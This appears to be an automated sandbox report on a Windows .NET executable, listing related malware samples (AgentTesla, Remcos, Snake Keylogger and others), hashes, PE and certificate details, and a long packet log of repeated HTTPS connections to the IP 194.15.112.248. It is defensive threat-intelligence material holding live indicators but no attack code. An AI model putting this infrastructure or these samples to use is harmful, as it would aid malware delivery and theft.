| | 1pXdiCesZ6.exe | malicious | DanaBot | 194.15.112.203 |
| | bad.pdf.exe | malicious | Unknown | 194.15.113.200 |

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 3b5074b1b5d032e5620f69f9f700ff0e | xUPaeKk5wQ.msi | malicious | AteraAgent | 194.15.112.248 |
| | 7gBUqzSN3y.msi | malicious | AteraAgent | 194.15.112.248 |
| | PO-8776-2024.js | malicious | Remcos | 194.15.112.248 |
| | New Order Enquiry.js | malicious | AgentTesla | 194.15.112.248 |
| | Bunker_STS_pdf.vbs | malicious | Unknown | 194.15.112.248 |
| | Hesap_Hareketleri_10122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 194.15.112.248 |
| | Hesap_Hareketleri_09122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 194.15.112.248 |
| | E-dekont.exe | malicious | MassLogger RAT | 194.15.112.248 |
| | Hesaphareketi-01.pdf.exe | malicious | Snake Keylogger | 194.15.112.248 |

No context
No created / dropped files found

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 3.503258515872725
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Ref_31020563.exe
File size: 180'704 bytes
MD5: 7c8431a3c14296cff7381cc69b61bad8
SHA1: d3d20ede9527fdbeb8252118af55558037721630
SHA256: 881d0d3e98524b861548955ed7ced7f91de3a39d50feb573896694188e7fecff
SHA512: 43029de7a6896a3e9b1037c02658b25ef222fa891f22551c6e934c6d0fe1a4a127e5f7f3d37490ede23be27534410dbd2ac846c0722c3ff909be3933bb166f8b
SSDEEP: 384:eNuji6i2UKsMQmZjVBjN4IXQxxkSlSlSlSlSlKlfalfalfalfalfalfalfalfalt:sH22m5vHzhVCa3K6XiFZKj
TLSH: 43041A63B53CC4E2F89C3DF09A5997256AB16E920238F087E54FBDC6E8B3623C6051D5
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9Xg............................^+... ...@....@.. ....................................`................................
Icon Hash: 07d8d8d4d4d85026
Entrypoint: 0x402b5e
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6758390D [Tue Dec 10 12:50:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid: false
Signature Issuer: CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 04/07/2024 00:35:32 15/05/2027 11:15:04
Subject Chain
• OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
Version: 3
Thumbprint MD5: FF0E889D2A73C3A679605952D35452DC
Thumbprint SHA-1: 2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
Thumbprint SHA-256: A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
Serial: 6DD2E3173995F51BFAC1D9FB4CB200C1
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2b08 | 0x53 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x29276 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x2a400 | 0x1de0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb64 | 0xc00 | 4b0bc13289f9896f4f7af2fcb8f4e52f | False | 0.5716145833333334 | data | 5.189697873641547 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0x29276 | 0x29400 | 04ee348ac2debaee0968c396aa0f5c6c | False | 0.0558297821969697 | data | 3.0574613817425944 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2e000 | 0xc | 0x200 | d41fb489799b709e37a733d4ed02be14 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x42b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.17375886524822695
RT_ICON | 0x4718 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.11229508196721312
RT_ICON | 0x50a0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.06941838649155722
RT_ICON | 0x6148 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.03973029045643153
RT_ICON | 0x86f0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.029168634860651865
RT_ICON | 0xc918 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | | | 0.03022181146025878
RT_ICON | 0x11da0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.019261088921589238
RT_ICON | 0x1b248 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.023837690760676683
RT_ICON | 0x2ba70 | 0x1285 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8517190466146383
RT_GROUP_ICON | 0x2ccf8 | 0x84 | data | | | 0.7272727272727273
RT_VERSION | 0x2cd7c | 0x310 | data | | | 0.4489795918367347
RT_MANIFEST | 0x2d08c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Dec 10, 2024 16:28:01.651263952 CET44349727194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:01.651307106 CET49727443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.651356936 CET49727443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.651921988 CET49727443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.652420044 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.652456045 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:01.654508114 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.654773951 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:01.654793978 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:03.736123085 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:03.738080978 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:03.738106966 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:04.541651964 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:04.541686058 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:04.541764021 CET44349728194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:04.541807890 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.541832924 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.542392969 CET49728443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.542953968 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.542994976 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:04.543104887 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.543337107 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:04.543349028 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:06.623861074 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:06.625663042 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:06.625684023 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:07.439620018 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:07.439644098 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:07.439733028 CET44349729194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:07.439748049 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.439779997 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.440263987 CET49729443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.440776110 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.440830946 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:07.440916061 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.441123962 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:07.441143036 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:09.532721043 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:09.539499044 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:09.539526939 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:10.362154007 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:10.362179041 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:10.362243891 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.362250090 CET44349730194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:10.362302065 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.362736940 CET49730443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.363424063 CET49731443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.363462925 CET44349731194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:10.363532066 CET49731443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.363811970 CET49731443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:10.363820076 CET44349731194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:12.457000971 CET44349731194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:12.459248066 CET49731443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:12.459264040 CET44349731194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:13.255551100 CET44349731194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:13.255575895 CET44349731194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:13.255645037 CET44349731194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:13.255667925 CET49731443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:13.255693913 CET49731443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:13.256149054 CET49731443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:13.256659985 CET49732443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:13.256720066 CET44349732194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:13.256793976 CET49732443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:13.256999969 CET49732443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:13.257009983 CET44349732194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:15.340966940 CET44349732194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:15.342789888 CET49732443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:15.342808962 CET44349732194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:16.139652967 CET44349732194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:16.139683962 CET44349732194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:16.139750957 CET44349732194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:16.139820099 CET49732443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:16.139878988 CET49732443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:16.140589952 CET49732443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:16.141187906 CET49733443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:16.141247034 CET44349733194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:16.141458035 CET49733443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:16.141761065 CET49733443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:16.141777039 CET44349733194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:18.209656000 CET44349733194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:18.211488962 CET49733443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:18.211509943 CET44349733194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:19.004123926 CET44349733194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:19.004151106 CET44349733194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:19.004220009 CET44349733194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:19.004257917 CET49733443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:19.004317999 CET49733443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:19.004864931 CET49733443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:19.005479097 CET49735443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:19.005507946 CET44349735194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:19.005583048 CET49735443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:19.005834103 CET49735443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:19.005847931 CET44349735194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:21.109280109 CET44349735194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:21.110878944 CET49735443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:21.110908031 CET44349735194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:21.900368929 CET44349735194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:21.900392056 CET44349735194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:21.900454044 CET44349735194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:21.900489092 CET49735443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:21.900527954 CET49735443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:21.900986910 CET49735443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:21.901489019 CET49736443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:21.901540041 CET44349736194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:21.904679060 CET49736443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:21.905015945 CET49736443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:21.905030966 CET44349736194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:23.981324911 CET44349736194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:23.989475965 CET49736443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:23.989505053 CET44349736194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:24.793131113 CET44349736194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:24.793153048 CET44349736194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:24.793221951 CET44349736194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:24.793292999 CET49736443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:24.793324947 CET49736443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:24.793823004 CET49736443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:24.794351101 CET49737443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:24.794401884 CET44349737194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:24.794492006 CET49737443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:24.794689894 CET49737443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:24.794706106 CET44349737194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:26.881321907 CET44349737194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:26.889056921 CET49737443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:26.889076948 CET44349737194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:27.680766106 CET44349737194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:27.680790901 CET44349737194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:27.680845022 CET44349737194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:27.680901051 CET49737443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:27.680942059 CET49737443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:27.681468964 CET49737443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:27.682049036 CET49738443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:27.682104111 CET44349738194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:27.682174921 CET49738443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:27.682454109 CET49738443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:27.682465076 CET44349738194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:29.775221109 CET44349738194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:29.777261019 CET49738443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:29.777287006 CET44349738194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:30.557020903 CET44349738194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:30.557046890 CET44349738194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:30.557105064 CET44349738194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:30.557149887 CET49738443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:30.557168007 CET49738443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:30.557709932 CET49738443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:30.558227062 CET49739443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:30.558275938 CET44349739194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:30.558357954 CET49739443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:30.558563948 CET49739443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:30.558579922 CET44349739194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:32.638113976 CET44349739194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:32.640327930 CET49739443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:32.640357971 CET44349739194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:33.416794062 CET44349739194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:33.416824102 CET44349739194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:33.416884899 CET44349739194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:33.416979074 CET49739443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:33.416979074 CET49739443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:33.417542934 CET49739443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:33.418083906 CET49740443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:33.418142080 CET44349740194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:33.418215036 CET49740443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:33.418431997 CET49740443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:33.418442965 CET44349740194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:35.510230064 CET44349740194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:35.546952009 CET49740443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:35.546982050 CET44349740194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:36.346864939 CET44349740194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:36.346900940 CET44349740194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:36.346971989 CET44349740194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:36.346998930 CET49740443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:36.347032070 CET49740443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:36.347695112 CET49740443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:36.348366022 CET49741443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:36.348417044 CET44349741194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:36.348503113 CET49741443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:36.348742962 CET49741443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:36.348753929 CET44349741194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:38.389345884 CET44349741194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:38.394184113 CET49741443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:38.394217968 CET44349741194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:39.176527023 CET44349741194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:39.176558971 CET44349741194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:39.176630020 CET44349741194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:39.176667929 CET49741443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:39.176834106 CET49741443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:39.177282095 CET49741443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:39.177915096 CET49742443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:39.177963018 CET44349742194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:39.178033113 CET49742443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:39.178327084 CET49742443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:39.178337097 CET44349742194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:41.249886990 CET44349742194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:41.286711931 CET49742443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:41.286756039 CET44349742194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:42.030278921 CET44349742194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:42.030318022 CET44349742194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:42.030388117 CET44349742194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:42.030488014 CET49742443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:42.031012058 CET49742443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:42.031548977 CET49743443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:42.031603098 CET44349743194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:42.031804085 CET49743443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:42.032105923 CET49743443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:42.032118082 CET44349743194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:44.232527018 CET44349743194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:44.239741087 CET49743443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:44.239794970 CET44349743194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:45.034420013 CET44349743194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:45.034446001 CET44349743194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:45.034508944 CET44349743194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:45.034517050 CET49743443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:45.034557104 CET49743443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:45.035137892 CET49743443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:45.035701036 CET49744443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:45.035737038 CET44349744194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:45.035810947 CET49744443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:45.036062002 CET49744443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:45.036073923 CET44349744194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:47.107255936 CET44349744194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:47.131531000 CET49744443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:47.131560087 CET44349744194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:47.921622038 CET44349744194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:47.921655893 CET44349744194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:47.921757936 CET49744443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:47.921792030 CET44349744194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:47.921829939 CET44349744194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:47.921866894 CET49744443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:47.922343969 CET49744443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:47.922871113 CET49745443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:47.922928095 CET44349745194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:47.922996998 CET49745443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:47.923218012 CET49745443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:47.923230886 CET44349745194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:49.997997046 CET44349745194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:49.999872923 CET49745443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:49.999908924 CET44349745194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:51.845261097 CET44349745194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:51.845289946 CET44349745194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:51.845352888 CET44349745194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:51.845398903 CET49745443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:51.845427990 CET49745443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:51.845958948 CET49745443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:51.846568108 CET49746443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:51.846616030 CET44349746194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:51.846689939 CET49746443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:51.846957922 CET49746443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:51.846972942 CET44349746194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:53.932954073 CET44349746194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:53.934504032 CET49746443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:28:53.934541941 CET44349746194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:28:54.729605913 CET44349746194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:02.080657959 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:02.080709934 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:02.080801964 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:02.081020117 CET49770443192.168.2.8194.15.112.248
